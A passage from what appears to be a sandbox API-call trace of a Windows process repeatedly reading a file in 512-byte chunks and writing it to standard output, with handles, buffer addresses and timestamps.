lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.231] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.231] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.232] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.232] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] GetFileType (hFile=0x50) returned 0x1 [0236.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.232] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.233] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.233] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] GetFileType (hFile=0x50) returned 0x1 [0236.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.234] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.234] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] GetFileType (hFile=0x50) returned 0x1 [0236.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.235] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.235] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] GetFileType (hFile=0x50) returned 0x1 [0236.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.235] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] GetFileType (hFile=0x50) returned 0x1 [0236.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.236] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.237] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] GetFileType (hFile=0x50) returned 0x1 [0236.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.237] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.238] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.238] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] GetFileType (hFile=0x50) returned 0x1 [0236.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.238] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, 